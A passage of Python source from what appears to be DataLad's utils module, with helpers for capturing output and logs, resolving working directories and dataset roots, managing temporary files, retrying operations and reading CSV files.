sname)\n del self._out\n del self._err\n gc.collect()\n rmtemp(out_name)\n rmtemp(err_name)\n\n@contextmanager\ndef swallow_outputs() -> Iterator[SwallowOutputsAdapter]:\n \"\"\"Context manager to help consuming both stdout and stderr, and print()\n\n stdout is available as cm.out and stderr as cm.err whenever cm is the\n yielded context manager.\n Internally uses temporary files to guarantee absent side-effects of swallowing\n into StringIO which lacks .fileno.\n\n print mocking is necessary for some uses where sys.stdout was already bound\n to original sys.stdout, thus mocking it later had no effect. Overriding\n print function had desired effect\n \"\"\"\n\n def fake_print(*args: str, sep: str = ' ', end: str = \"\\n\", file: Optional[IO[str]] = None) -> None:\n if file is None:\n file = sys.stdout\n\n if file in (oldout, olderr, sys.stdout, sys.stderr):\n # we mock\n try:\n sys.stdout.write(sep.join(args) + end)\n except UnicodeEncodeError as exc:\n lgr.error(\n \"Failed to write to mocked stdout, got %s, continue as it \"\n \"didn't happen\", exc)\n else:\n # must be some other file one -- leave it alone\n oldprint(*args, sep=sep, end=end, file=file)\n\n from .ui import ui\n\n # preserve -- they could have been mocked already\n oldprint = getattr(builtins, 'print')\n oldout, olderr = sys.stdout, sys.stderr\n olduiout = ui.out\n adapter = SwallowOutputsAdapter()\n\n try:\n sys.stdout, sys.stderr = adapter.handles\n ui.out = adapter.handles[0]\n setattr(builtins, 'print', fake_print)\n\n yield adapter\n finally:\n sys.stdout, sys.stderr, ui.out = oldout, olderr, olduiout\n setattr(builtins, 'print', oldprint)\n adapter.cleanup()\n\n\n# Let's log everything into a string\n# TODO: generalize with the one for swallow_outputs\nclass SwallowLogsAdapter:\n \"\"\"Little adapter to help getting out values\n\n And to stay consistent with how swallow_outputs behaves\n \"\"\"\n def __init__(self, file_: str | Path | None) -> None:\n self._out: IO[str]\n if file_ is None:\n kw = get_tempfile_kwargs({}, prefix=\"logs\")\n self._out = NamedTemporaryFile(mode='a', delete=False, **kw)\n else:\n out_file = file_\n # PY3 requires clearly one or another. race condition possible\n self._out = open(out_file, 'a')\n self.file = file_\n self._final_out: Optional[str] = None\n\n def _read(self, h: IO[str]) -> str:\n with open(h.name) as f:\n return f.read()\n\n @property\n def out(self) -> str:\n if self._final_out is not None:\n # we closed and cleaned up already\n return self._final_out\n else:\n self._out.flush()\n return self._read(self._out)\n\n @property\n def lines(self) -> list[str]:\n return self.out.split('\\n')\n\n @property\n def handle(self) -> IO[str]:\n return self._out\n\n def cleanup(self) -> None:\n # store for access while object exists\n self._final_out = self.out\n self._out.close()\n out_name = self._out.name\n del self._out\n gc.collect()\n if not self.file:\n rmtemp(out_name)\n\n def assert_logged(self, msg: Optional[str]=None, level: Optional[str]=None, regex: bool =True, **kwargs: Any) -> None:\n \"\"\"Provide assertion on whether a msg was logged at a given level\n\n If neither `msg` nor `level` provided, checks if anything was logged\n at all.\n\n Parameters\n ----------\n msg: str, optional\n Message (as a regular expression, if `regex`) to be searched.\n If no msg provided, checks if anything was logged at a given level.\n level: str, optional\n String representing the level to be logged\n regex: bool, optional\n If False, regular `assert_in` is used\n **kwargs: str, optional\n Passed to `assert_re_in` or `assert_in`\n \"\"\"\n from datalad.tests.utils_pytest import (\n assert_in,\n assert_re_in,\n )\n\n if regex:\n match = r'\\[%s\\] ' % level if level else r\"\\[\\S+\\] \"\n else:\n match = '[%s] ' % level if level else ''\n\n if msg:\n match += msg\n\n if match:\n (assert_re_in if regex else assert_in)(match, self.out, **kwargs)\n else:\n assert not kwargs, \"no kwargs to be passed anywhere\"\n assert self.out, \"Nothing was logged!?\"\n\n\n@contextmanager\ndef swallow_logs(new_level: str | int | None = None, file_ : str | Path | None = None, name: str='datalad') -> Iterator[SwallowLogsAdapter]:\n \"\"\"Context manager to consume all logs.\"\"\"\n lgr = logging.getLogger(name)\n\n # Keep old settings\n old_level = lgr.level\n old_handlers = lgr.handlers\n\n adapter = SwallowLogsAdapter(file_)\n # TODO: it does store messages but without any formatting, i.e. even without\n # date/time prefix etc. IMHO it should preserve formatting in case if file_ is\n # set\n swallow_handler = logging.StreamHandler(adapter.handle)\n # we want to log levelname so we could test against it\n swallow_handler.setFormatter(\n logging.Formatter('[%(levelname)s] %(message)s'))\n swallow_handler.filters = sum([h.filters for h in old_handlers],\n [])\n lgr.handlers = [swallow_handler]\n if old_level < logging.DEBUG: # so if HEAVYDEBUG etc -- show them!\n lgr.handlers += old_handlers\n\n if isinstance(new_level, str):\n new_level = getattr(logging, new_level)\n\n if new_level is not None:\n lgr.setLevel(new_level)\n\n try:\n yield adapter\n # TODO: if file_ and there was an exception -- most probably worth logging it?\n # although ideally it should be the next log outside added to that file_ ... oh well\n finally:\n lgr.handlers = old_handlers\n lgr.setLevel(old_level)\n adapter.cleanup()\n\n\n# TODO: May be melt in with swallow_logs at some point:\n@contextmanager\ndef disable_logger(logger: Optional[logging.Logger]=None) -> Iterator[logging.Logger]:\n \"\"\"context manager to temporarily disable logging\n\n This is to provide one of swallow_logs' purposes without unnecessarily\n creating temp files (see gh-1865)\n\n Parameters\n ----------\n logger: Logger\n Logger whose handlers will be ordered to not log anything.\n Default: datalad's topmost Logger ('datalad')\n \"\"\"\n\n class NullFilter(logging.Filter):\n \"\"\"Filter class to reject all records\n \"\"\"\n def filter(self, record: logging.LogRecord) -> bool:\n return False\n\n if logger is None:\n # default: all of datalad's logging:\n logger = logging.getLogger('datalad')\n\n filter_ = NullFilter(logger.name)\n for h in logger.handlers:\n h.addFilter(filter_)\n\n try:\n yield logger\n finally:\n for h in logger.handlers:\n h.removeFilter(filter_)\n\n\n@contextmanager\ndef lock_if_required(lock_required: bool, lock: threading.Lock) -> Iterator[threading.Lock]:\n \"\"\" Acquired and released the provided lock if indicated by a flag\"\"\"\n if lock_required:\n lock.acquire()\n try:\n yield lock\n finally:\n if lock_required:\n lock.release()\n\n\n#\n# Additional handlers\n#\ndef ensure_dir(*args: str) -> str:\n \"\"\"Make sure directory exists.\n\n Joins the list of arguments to an os-specific path to the desired\n directory and creates it, if it not exists yet.\n \"\"\"\n dirname = op.join(*args)\n if not exists(dirname):\n os.makedirs(dirname)\n return dirname\n\n\ndef updated(d: dict[K, V], update: dict[K, V]) -> dict[K, V]:\n \"\"\"Return a copy of the input with the 'update'\n\n Primarily for updating dictionaries\n \"\"\"\n d = d.copy()\n d.update(update)\n return d\n\n\n_pwd_mode: Optional[str] = None\n\n\ndef _switch_to_getcwd(msg: str, *args: Any) -> None:\n global _pwd_mode\n _pwd_mode = 'cwd'\n lgr.debug(\n msg + \". From now on will be returning os.getcwd(). Directory\"\n \" symlinks in the paths will be resolved\",\n *args\n )\n # TODO: we might want to mitigate by going through all flywheighted\n # repos and tuning up their .paths to be resolved?\n\n\ndef getpwd() -> str:\n \"\"\"Try to return a CWD without dereferencing possible symlinks\n\n This function will try to use PWD environment variable to provide a current\n working directory, possibly with some directories along the path being\n symlinks to other directories. Unfortunately, PWD is used/set only by the\n shell and such functions as `os.chdir` and `os.getcwd` nohow use or modify\n it, thus `os.getcwd()` returns path with links dereferenced.\n\n While returning current working directory based on PWD env variable we\n verify that the directory is the same as `os.getcwd()` after resolving all\n symlinks. If that verification fails, we fall back to always use\n `os.getcwd()`.\n\n Initial decision to either use PWD env variable or os.getcwd() is done upon\n the first call of this function.\n \"\"\"\n global _pwd_mode\n if _pwd_mode is None:\n # we need to decide!\n try:\n pwd = os.environ['PWD']\n if on_windows and pwd and pwd.startswith('/'):\n # It should be a path from MSYS.\n # - it might start with a drive letter or not\n # - it seems to be \"illegal\" to have a single letter directories\n # under / path, i.e. if created - they aren't found\n # - 'ln -s' does not fail to create a \"symlink\" but it just\n # copies!\n # so we are not likely to need original PWD purpose on\n # those systems\n # Verdict:\n _pwd_mode = 'cwd'\n else:\n _pwd_mode = 'PWD'\n except KeyError:\n _pwd_mode = 'cwd'\n\n if _pwd_mode == 'cwd':\n return os.getcwd()\n elif _pwd_mode == 'PWD':\n try:\n cwd = os.getcwd()\n except OSError as exc:\n if \"o such file\" in str(exc):\n # directory was removed but we promised to be robust and\n # still report the path we might know since we are still in PWD\n # mode\n cwd = None\n else:\n raise\n try:\n pwd = os.environ['PWD']\n # do absolute() in addition to always get an absolute path\n # even with non-existing paths on windows\n pwd_real = str(Path(pwd).resolve().absolute())\n # This logic would fail to catch the case where chdir did happen\n # to the directory where current PWD is pointing to, e.g.\n # $> ls -ld $PWD\n # lrwxrwxrwx 1 yoh yoh 5 Oct 11 13:27 /home/yoh/.tmp/tmp -> /tmp//\n # hopa:~/.tmp/tmp\n # $> python -c 'import os; os.chdir(\"/tmp\"); from datalad.utils import getpwd; print(getpwd(), os.getcwd())'\n # ('/home/yoh/.tmp/tmp', '/tmp')\n # but I guess that should not be too harmful\n if cwd is not None and pwd_real != cwd:\n _switch_to_getcwd(\n \"realpath of PWD=%s is %s whenever os.getcwd()=%s\",\n pwd, pwd_real, cwd\n )\n return cwd\n return pwd\n except KeyError:\n _switch_to_getcwd(\"PWD env variable is no longer available\")\n if cwd is not None:\n return cwd # Must not happen, but may be someone\n # evil purges PWD from environ?\n raise RuntimeError(\n \"Must have not got here. \"\n \"pwd_mode must be either cwd or PWD. And it is now %r\" % (_pwd_mode,)\n )\n\n\nclass chpwd:\n \"\"\"Wrapper around os.chdir which also adjusts environ['PWD']\n\n The reason is that otherwise PWD is simply inherited from the shell\n and we have no ability to assess directory path without dereferencing\n symlinks.\n\n If used as a context manager it allows to temporarily change directory\n to the given path\n \"\"\"\n def __init__(self, path: str | Path | None, mkdir: bool=False, logsuffix: str='') -> None:\n\n self._prev_pwd: Optional[str]\n if path:\n pwd = getpwd()\n self._prev_pwd = pwd\n else:\n self._prev_pwd = None\n return\n\n if not isabs(path):\n path = normpath(op.join(pwd, path))\n if not os.path.exists(path) and mkdir:\n self._mkdir = True\n os.mkdir(path)\n else:\n self._mkdir = False\n lgr.debug(\"chdir %r -> %r %s\", self._prev_pwd, path, logsuffix)\n os.chdir(path) # for grep people -- ok, to chdir here!\n os.environ['PWD'] = str(path)\n\n def __enter__(self) -> None:\n # nothing more to do really, chdir was in the constructor\n pass\n\n def __exit__(self, exc_type: Optional[type[BaseException]], exc_val: Optional[BaseException], exc_tb: Optional[TracebackType]) -> None:\n if self._prev_pwd:\n # Need to use self.__class__ so this instance, if the entire\n # thing mocked during the test, still would use correct chpwd\n self.__class__(self._prev_pwd, logsuffix=\"(coming back)\")\n\n\ndef dlabspath(path: str | Path, norm: bool =False) -> str:\n \"\"\"Symlinks-in-the-cwd aware abspath\n\n os.path.abspath relies on os.getcwd() which would not know about symlinks\n in the path\n\n TODO: we might want to norm=True by default to match behavior of\n os .path.abspath?\n \"\"\"\n if not isabs(path):\n # if not absolute -- relative to pwd\n path = op.join(getpwd(), path)\n return normpath(path) if norm else str(path)\n\n\ndef with_pathsep(path: str) -> str:\n \"\"\"Little helper to guarantee that path ends with /\"\"\"\n return path + sep if not path.endswith(sep) else path\n\n\ndef get_path_prefix(path: str | Path, pwd: Optional[str]=None) -> str:\n \"\"\"Get path prefix (for current directory)\n\n Returns relative path to the topdir, if we are under topdir, and if not\n absolute path to topdir. If `pwd` is not specified - current directory\n assumed\n \"\"\"\n pwd = pwd or getpwd()\n path = dlabspath(path)\n path_ = with_pathsep(path)\n pwd_ = with_pathsep(pwd)\n common = commonprefix((path_, pwd_))\n if common.endswith(sep) and common in {path_, pwd_}:\n # we are in subdir or above the path = use relative path\n location_prefix = relpath(path, pwd)\n # if benign \"here\" - cut off\n if location_prefix in (curdir, curdir + sep):\n location_prefix = ''\n return location_prefix\n else:\n # just return absolute path\n return path\n\n\ndef _get_normalized_paths(path: str, prefix: str) -> tuple[str, str]:\n if isabs(path) != isabs(prefix):\n raise ValueError(\"Both paths must either be absolute or relative. \"\n \"Got %r and %r\" % (path, prefix))\n path = with_pathsep(path)\n prefix = with_pathsep(prefix)\n return path, prefix\n\n\ndef path_startswith(path: str, prefix: str) -> bool:\n \"\"\"Return True if path starts with prefix path\n\n Parameters\n ----------\n path: str\n prefix: str\n \"\"\"\n path, prefix = _get_normalized_paths(path, prefix)\n return path.startswith(prefix)\n\n\ndef path_is_subpath(path: str, prefix: str) -> bool:\n \"\"\"Return True if path is a subpath of prefix\n\n It will return False if path == prefix.\n\n Parameters\n ----------\n path: str\n prefix: str\n \"\"\"\n path, prefix = _get_normalized_paths(path, prefix)\n return (len(prefix) < len(path)) and path.startswith(prefix)\n\n\ndef knows_annex(path: str | Path) -> bool:\n \"\"\"Returns whether at a given path there is information about an annex\n\n It is just a thin wrapper around GitRepo.is_with_annex() classmethod\n which also checks for `path` to exist first.\n\n This includes actually present annexes, but also uninitialized ones, or\n even the presence of a remote annex branch.\n \"\"\"\n from os.path import exists\n if not exists(path):\n lgr.debug(\"No annex: test path %s doesn't exist\", path)\n return False\n from datalad.support.gitrepo import GitRepo\n return GitRepo(path, init=False, create=False).is_with_annex()\n\n\n@contextmanager\ndef make_tempfile(content: str | bytes | None = None, wrapped: Optional[Callable[..., Any]] = None, **tkwargs: Any) -> Iterator[str]:\n \"\"\"Helper class to provide a temporary file name and remove it at the end (context manager)\n\n Parameters\n ----------\n mkdir : bool, optional (default: False)\n If True, temporary directory created using tempfile.mkdtemp()\n content : str or bytes, optional\n Content to be stored in the file created\n wrapped : function, optional\n If set, function name used to prefix temporary file name\n `**tkwargs`:\n All other arguments are passed into the call to tempfile.mk{,d}temp(),\n and resultant temporary filename is passed as the first argument into\n the function t. If no 'prefix' argument is provided, it will be\n constructed using module and function names ('.' replaced with\n '_').\n\n To change the used directory without providing keyword argument 'dir' set\n DATALAD_TESTS_TEMP_DIR.\n\n Examples\n --------\n >>> from os.path import exists\n >>> from datalad.utils import make_tempfile\n >>> with make_tempfile() as fname:\n ... k = open(fname, 'w').write('silly test')\n >>> assert not exists(fname) # was removed\n\n >>> with make_tempfile(content=\"blah\") as fname:\n ... assert open(fname).read() == \"blah\"\n \"\"\"\n\n if tkwargs.get('mkdir', None) and content is not None:\n raise ValueError(\"mkdir=True while providing content makes no sense\")\n\n tkwargs_ = get_tempfile_kwargs(tkwargs, wrapped=wrapped)\n\n # if DATALAD_TESTS_TEMP_DIR is set, use that as directory,\n # let mktemp handle it otherwise. However, an explicitly provided\n # dir=... will override this.\n mkdir = bool(tkwargs_.pop('mkdir', False))\n\n filename = {False: tempfile.mktemp,\n True: tempfile.mkdtemp}[mkdir](**tkwargs_)\n # MIH: not clear to me why we need to perform this (possibly expensive)\n # resolve. It was already part of the original implementation\n # 008d9ab8cc3e0170c0a9b8479e80dee9ffe6eb7f\n filepath = Path(filename).resolve()\n\n if content:\n if isinstance(content, bytes):\n filepath.write_bytes(content)\n else:\n filepath.write_text(content)\n\n # TODO globbing below can also be done with pathlib\n filename = str(filepath)\n\n if __debug__:\n lgr.debug(\n 'Created temporary %s named %s',\n 'directory' if mkdir else 'file',\n filename)\n try:\n yield filename\n finally:\n # glob here for all files with the same name (-suffix)\n # would be useful whenever we requested .img filename,\n # and function creates .hdr as well\n # MIH: this is undocumented behavior, and undesired in the general\n # case. it should be made conditional and explicit\n lsuffix = len(tkwargs_.get('suffix', ''))\n filename_ = lsuffix and filename[:-lsuffix] or filename\n filenames = glob.glob(filename_ + '*')\n if len(filename_) < 3 or len(filenames) > 5:\n # For paranoid yoh who stepped into this already ones ;-)\n lgr.warning(\"It is unlikely that it was intended to remove all\"\n \" files matching %r. Skipping\" % filename_)\n return\n for f in filenames:\n try:\n rmtemp(f)\n except OSError: # pragma: no cover\n pass\n\n\ndef _path_(*p: str) -> str:\n \"\"\"Given a path in POSIX notation, regenerate one in native to the env one\"\"\"\n if on_windows:\n return op.join(*map(lambda x: op.join(*x.split('/')), p))\n else:\n # Assume that all others as POSIX compliant so nothing to be done\n return op.join(*p)\n\n\ndef get_timestamp_suffix(time_: int | time.struct_time | None=None, prefix: str='-') -> str:\n \"\"\"Return a time stamp (full date and time up to second)\n\n primarily to be used for generation of log files names\n \"\"\"\n args = []\n if time_ is not None:\n if isinstance(time_, int):\n time_ = time.gmtime(time_)\n args.append(time_)\n return time.strftime(prefix + TIMESTAMP_FMT, *args)\n\n\n# unused in -core\ndef get_logfilename(dspath: str | Path, cmd: str='datalad') -> str:\n \"\"\"Return a filename to use for logging under a dataset/repository\n\n directory would be created if doesn't exist, but dspath must exist\n and be a directory\n \"\"\"\n assert(exists(dspath))\n assert(isdir(dspath))\n ds_logdir = ensure_dir(str(dspath), '.git', 'datalad', 'logs') # TODO: use WEB_META_LOG whenever #789 merged\n return op.join(ds_logdir, 'crawl-%s.log' % get_timestamp_suffix())\n\n\ndef get_trace(edges: Sequence[tuple[T, T]], start: T, end: T, trace: Optional[list[T]]=None) -> Optional[list[T]]:\n \"\"\"Return the trace/path to reach a node in a tree.\n\n Parameters\n ----------\n edges : sequence(2-tuple)\n The tree given by a sequence of edges (parent, child) tuples. The\n nodes can be identified by any value and data type that supports\n the '==' operation.\n start :\n Identifier of the start node. Must be present as a value in the parent\n location of an edge tuple in order to be found.\n end :\n Identifier of the target/end node. Must be present as a value in the child\n location of an edge tuple in order to be found.\n trace : list\n Mostly useful for recursive calls, and used internally.\n\n Returns\n -------\n None or list\n Returns a list with the trace to the target (the starts and the target\n are not included in the trace, hence if start and end are directly connected\n an empty list is returned), or None when no trace to the target can be found,\n or start and end are identical.\n \"\"\"\n # the term trace is used to avoid confusion with a path in the sense\n # of a filesystem path, but the analogy fits and nodes can be paths\n if trace is None:\n trace = []\n if not edges:\n raise ValueError(\"no edges given\")\n for cand in edges:\n cand_super, cand_sub = cand\n if cand_sub in trace:\n # only DAGs, skip any cyclic traces\n continue\n if trace and cand_super != trace[-1]:\n # only consider edges that lead off the end of the trace\n continue\n if not trace and cand_super != start:\n # we got nothing yet, and this edges is not matching the start\n continue\n if cand_sub == end:\n return trace\n # dive into potential subnodes\n cand_trace = get_trace(\n edges,\n start,\n end,\n trace + [cand_sub])\n if cand_trace:\n return cand_trace\n return None\n\n\ndef get_dataset_root(path: str | Path) -> Optional[str]:\n \"\"\"Return the root of an existent dataset containing a given path\n\n The root path is returned in the same absolute or relative form\n as the input argument. If no associated dataset exists, or the\n input path doesn't exist, None is returned.\n\n If `path` is a symlink or something other than a directory, its\n the root dataset containing its parent directory will be reported.\n If none can be found, at a symlink at `path` is pointing to a\n dataset, `path` itself will be reported as the root.\n\n Parameters\n ----------\n path : Path-like\n\n Returns\n -------\n str or None\n \"\"\"\n\n # NOTE: path = \"\" is effectively \".\"\n\n path = str(path)\n suffix = '.git'\n altered = None\n if islink(path) or not isdir(path):\n altered = path\n path = dirname(path)\n apath = abspath(path)\n # while we can still go up\n while split(apath)[1]:\n if exists(op.join(path, suffix)):\n return path\n # new test path in the format we got it\n path = normpath(op.join(path, os.pardir))\n # no luck, next round\n apath = abspath(path)\n # if we applied dirname() at the top, we give it another go with\n # the actual path, if it was itself a symlink, it could be the\n # top-level dataset itself\n if altered and exists(op.join(altered, suffix)):\n return altered\n\n return None\n\n\n# ATM used in datalad_crawler extension, so do not remove yet\ndef try_multiple(ntrials: int, exception: type[BaseException], base: float, f: Callable[P, T], *args: P.args, **kwargs: P.kwargs) -> T:\n \"\"\"Call f multiple times making exponentially growing delay between the calls\"\"\"\n for trial in range(1, ntrials+1):\n try:\n return f(*args, **kwargs)\n except exception as exc:\n if trial == ntrials:\n raise # just reraise on the last trial\n t = base ** trial\n lgr.warning(\"Caught %s on trial #%d. Sleeping %f and retrying\",\n CapturedException(exc), trial, t)\n sleep(t)\n raise ValueError(\"ntrials must be > 0\")\n\n\n@optional_args\ndef try_multiple_dec(\n f: Callable[P, T],\n ntrials: Optional[int] = None,\n duration: float = 0.1,\n exceptions: type[BaseException] | tuple[type[BaseException], ...] | None = None,\n increment_type: Literal[\"exponential\"] | None = None,\n exceptions_filter: Optional[Callable[[BaseException], Any]] = None,\n logger: Optional[Callable] = None,\n) -> Callable[P, T]:\n \"\"\"Decorator to try function multiple times.\n\n Main purpose is to decorate functions dealing with removal of files/directories\n and which might need a few seconds to work correctly on Windows which takes\n its time to release files/directories.\n\n Parameters\n ----------\n ntrials: int, optional\n duration: float, optional\n Seconds to sleep before retrying.\n increment_type: {None, 'exponential'}\n Note that if it is exponential, duration should typically be > 1.0\n so it grows with higher power\n exceptions: Exception or tuple of Exceptions, optional\n Exception or a tuple of multiple exceptions, on which to retry\n exceptions_filter: callable, optional\n If provided, this function will be called with a caught exception\n instance. If function returns True - we will re-try, if False - exception\n will be re-raised without retrying.\n logger: callable, optional\n Logger to log upon failure. If not provided, will use stock logger\n at the level of 5 (heavy debug).\n \"\"\"\n # We need to bind these to new names so that mypy doesn't complain about\n # the values possibly being `None` inside the inner function:\n exceptions_: type[BaseException] | tuple[type[BaseException], ...]\n if not exceptions:\n exceptions_ = (OSError, PermissionError) if on_windows else OSError\n else:\n exceptions_ = exceptions\n if not ntrials:\n # Life goes fast on proper systems, no need to delay it much\n ntrials_ = 100 if on_windows else 10\n else:\n ntrials_ = ntrials\n if logger is None:\n def logger_(*args: Any, **kwargs: Any) -> None:\n return lgr.log(5, *args, **kwargs)\n else:\n logger_ = logger\n assert increment_type in {None, 'exponential'}\n\n @wraps(f)\n def _wrap_try_multiple_dec(*args: P.args, **kwargs: P.kwargs) -> T:\n t = duration\n for trial in range(ntrials_):\n try:\n return f(*args, **kwargs)\n except exceptions_ as exc:\n if exceptions_filter and not exceptions_filter(exc):\n raise\n if trial < ntrials_ - 1:\n if increment_type == 'exponential':\n t = duration ** (trial + 1)\n logger_(\n \"Caught %s on trial #%d. Sleeping %f and retrying\",\n CapturedException(exc), trial, t)\n sleep(t)\n else:\n raise\n raise ValueError(\"ntrials must be > 0\")\n\n return _wrap_try_multiple_dec\n\n\n@try_multiple_dec\ndef unlink(f: str | Path) -> None:\n \"\"\"'Robust' unlink. Would try multiple times\n\n On windows boxes there is evidence for a latency of more than a second\n until a file is considered no longer \"in-use\".\n WindowsError is not known on Linux, and if IOError or any other\n exception\n is thrown then if except statement has WindowsError in it -- NameError\n also see gh-2533\n \"\"\"\n # Check for open files\n assert_no_open_files(f)\n return os.unlink(f)\n\n\n@try_multiple_dec\ndef _rmtree(*args: Any, **kwargs: Any) -> None:\n \"\"\"Just a helper to decorate shutil.rmtree.\n\n rmtree defined above does more and ideally should not itself be decorated\n since a recursive definition and does checks for open files inside etc -\n might be too runtime expensive\n \"\"\"\n shutil.rmtree(*args, **kwargs)\n\n\ndef slash_join(base: Optional[str], extension: Optional[str]) -> Optional[str]:\n \"\"\"Join two strings with a '/', avoiding duplicate slashes\n\n If any of the strings is None the other is returned as is.\n \"\"\"\n if extension is None:\n return base\n if base is None:\n return extension\n return '/'.join(\n (base.rstrip('/'),\n extension.lstrip('/')))\n\n\n#\n# IO Helpers\n#\n\n# unused in -core\ndef open_r_encdetect(fname: str | Path, readahead: int=1000) -> IO[str]:\n \"\"\"Return a file object in read mode with auto-detected encoding\n\n This is helpful when dealing with files of unknown encoding.\n\n Parameters\n ----------\n readahead: int, optional\n How many bytes to read for guessing the encoding type. If\n negative - full file will be read\n \"\"\"\n import io\n\n from chardet import detect\n\n # read some bytes from the file\n with open(fname, 'rb') as f:\n head = f.read(readahead)\n enc = detect(head)\n denc = enc.get('encoding', None)\n lgr.debug(\"Auto-detected encoding %s for file %s (confidence: %s)\",\n denc,\n fname,\n enc.get('confidence', 'unknown'))\n return io.open(fname, encoding=denc)\n\n\n@overload\ndef read_file(fname: str | Path, decode: Literal[True] =True) -> str:\n ...\n\n@overload\ndef read_file(fname: str | Path, decode: Literal[False]) -> bytes:\n ...\n\ndef read_file(fname: str | Path, decode: Literal[True, False] =True) -> str | bytes:\n \"\"\"A helper to read file passing content via ensure_unicode\n\n Parameters\n ----------\n decode: bool, optional\n if False, no ensure_unicode and file content returned as bytes\n \"\"\"\n with open(fname, 'rb') as f:\n content = f.read()\n return ensure_unicode(content) if decode else content\n\n\ndef read_csv_lines(fname: str | Path, dialect: Optional[str] = None, readahead: int=16384, **kwargs: Any) -> Iterator[dict[str, str]]:\n \"\"\"A generator of dict records from a CSV/TSV\n\n Automatically guesses the encoding for each record to convert to UTF-8\n\n Parameters\n ----------\n fname: str\n Filename\n dialect: str, optional\n Dialect to specify to csv.reader. If not specified -- guessed from\n the file, if fails to guess, \"excel-tab\" is assumed\n readahead: int, optional\n How many bytes to read from the file to guess the type\n **kwargs\n Passed to `csv.reader`\n \"\"\"\n import csv\n csv_dialect: str | type[csv.Dialect]\n if dialect is None:\n with open(fname) as tsvfile:\n # add robustness, use a sniffer\n try:\n csv_dialect = csv.Sniffer().sniff(tsvfile.read(readahead))\n except Exception as exc:\n lgr.warning(\n 'Could not determine file-format, assuming TSV: %s',\n CapturedException(exc)\n )\n csv_dialect = 'excel-tab'\n else:\n csv_dialect = dialect\n\n with open(fname, 'r', encoding=\"utf-8\") as tsvfile:\n csv_reader = csv.reader(\n tsvfile,\n dialect=csv_dialect,\n **kwargs\n )\n header: Optional[list[str]] = None\n for row in csv_reader:\n if header is None:\n header = row\n else:\n yield dict(zip(header, row))\n\n\ndef import_modules(modnames: Iterable[str], pkg: str, msg: str=\"Failed to import {module}\", log: Callable[[str], Any]=lgr.debug) -> list[ModuleType]:\n \"\"\"Helper to import a list of modules without failing if N/A\n\n Parameters\n ----------\n modnames: list of str\n List of module names to import\n pkg: str\n Package under which to import\n msg: str, optional\n Message template for .format() to log at DEBUG level if import fails.\n Keys {module} and {package} will be provided and ': {exception}' appended\n log: callable, optional\n Logger call to use for logging messages\n \"\"\"\n from importlib import import_module\n _globals = globals()\n mods_loaded = []\n if pkg and not pkg in sys.modules:\n # with python 3.5.1 (ok with 3.5.5) somehow kept running into\n # Failed to import dlsub1: Parent module 'dltestm1' not loaded\n # while running the test. Preloading pkg resolved the issue\n import_module(pkg)\n for modname in modnames:\n try:\n _globals[modname] = mod = import_module(\n '.{}'.format(modname),\n pkg)\n mods_loaded.append(mod)\n except Exception as exc:\n from datalad.support.exceptions import CapturedException\n ce = CapturedException(exc)\n log((msg + ': {exception}').format(\n module=modname, package=pkg, exception=ce.message))\n return mods_loaded\n\n\ndef import_module_from_file(modpath: str, pkg: Optional[ModuleType]=None, log: Callable[[str], Any]=lgr.debug) -> ModuleType:\n \"\"\"Import provided module given a path\n\n TODO:\n - RF/make use of it in pipeline.py which has similar logic\n - join with import_modules above?\n\n Parameters\n ----------\n pkg: module, optional\n If provided, and modpath is under pkg.__path__, relative import will be\n used\n \"\"\"\n assert(modpath.endswith('.py')) # for now just for .py files\n\n log(\"Importing %s\" % modpath)\n\n modname = basename(modpath)[:-3]\n relmodpath = None\n if pkg:\n for pkgpath in pkg.__path__:\n if path_is_subpath(modpath, pkgpath):\n # for now relying on having .py extension -- assertion above\n relmodpath = '.' + relpath(modpath[:-3], pkgpath).replace(sep, '.')\n break\n\n try:\n if relmodpath:\n from importlib import import_module\n mod = import_module(relmodpath, pkg.__name__ if pkg is not None else None)\n else:\n dirname_ = dirname(modpath)\n try:\n sys.path.insert(0, dirname_)\n mod = __import__(modname, level=0)\n finally:\n if dirname_ in sys.path:\n sys.path.pop(sys.path.index(dirname_))\n else:\n log(\"Expected path %s to be within sys.path, but it was gone!\" % dirname_)\n except Exception as e:\n raise RuntimeError(\n \"Failed to import module from %s\" % modpath) from e\n\n return mod\n\n\ndef get_encoding_info() -> dict[str, str]:\n \"\"\"Return a dictionary with various encoding/locale information\"\"\"\n import locale\n import sys\n return dict([\n ('default', sys.getdefaultencoding()),\n ('filesystem', sys.getfilesystemencoding()),\n ('locale.prefered', locale.getpreferredencoding()),\n ])\n\n\ndef get_envvars_info() -> dict[str, str]:\n envs = []\n for var, val in os.environ.items():\n if (\n var.startswith('PYTHON') or\n var.startswith('LC_') or\n var.startswith('GIT_') or\n var in ('LANG', 'LANGUAGE', 'PATH')\n ):\n envs.append((var, val))\n return dict(envs)\n\n\n# This class is modified from Snakemake (v5.1.4)\nclass SequenceFormatter(string.Formatter):\n \"\"\"string.Formatter subclass with special behavior for sequences.\n\n This class delegates formatting of individual elements to another\n formatter object. Non-list objects are formatted by calling the\n delegate formatter's \"format_field\" method. List-like objects\n (list, tuple, set, frozenset) are formatted by formatting each\n element of the list according to the specified format spec using\n the delegate formatter and then joining the resulting strings with\n a separator (space by default).\n \"\"\"\n\n def __init__(self, separator: str=\" \", element_formatter: string.Formatter =string.Formatter(),\n *args: Any, **kwargs: Any) -> None:\n self.separator = separator\n self.element_formatter = element_formatter\n\n def format_element(self, elem: Any, format_spec: str) -> Any:\n \"\"\"Format a single element\n\n For sequences, this is called once for each element in a\n sequence. For anything else, it is called on the entire\n object. It is intended to be overridden in subclases.\n \"\"\"\n return self.element_formatter.format_field(elem, format_spec)\n\n def format_field(self, value: Any, format_spec: str) -> Any:\n if isinstance(value, (list, tuple, set, frozenset)):\n return self.separator.join(self.format_element(v, format_spec)\n for v in value)\n else:\n return self.format_element(value, format_spec)\n\n\n# TODO: eventually we might want to make use of attr module\nclass File:\n \"\"\"Helper for a file entry in the create_tree/@with_tree\n\n It allows to define additional settings for entries\n \"\"\"\n def __init__(self, name: str, executable: bool=False) -> None:\n \"\"\"\n\n Parameters\n ----------\n name : str\n Name of the file\n executable: bool, optional\n Make it executable\n \"\"\"\n self.name = name\n self.executable = executable\n\n def __str__(self) -> str:\n return self.name\n\n\nTreeSpec = Union[\n Tuple[Tuple[Union[str, File], \"Load\"], ...],\n List[Tuple[Union[str, File], \"Load\"]],\n Dict[Union[str, File], \"Load\"],\n]\n\nLoad = Union[str, bytes, \"TreeSpec\"]\n\n\ndef create_tree_archive(path: str, name: str, load: TreeSpec, overwrite: bool=False, archives_leading_dir: bool=True) -> None:\n \"\"\"Given an archive `name`, create under `path` with specified `load` tree\n \"\"\"\n from datalad.support.archives import 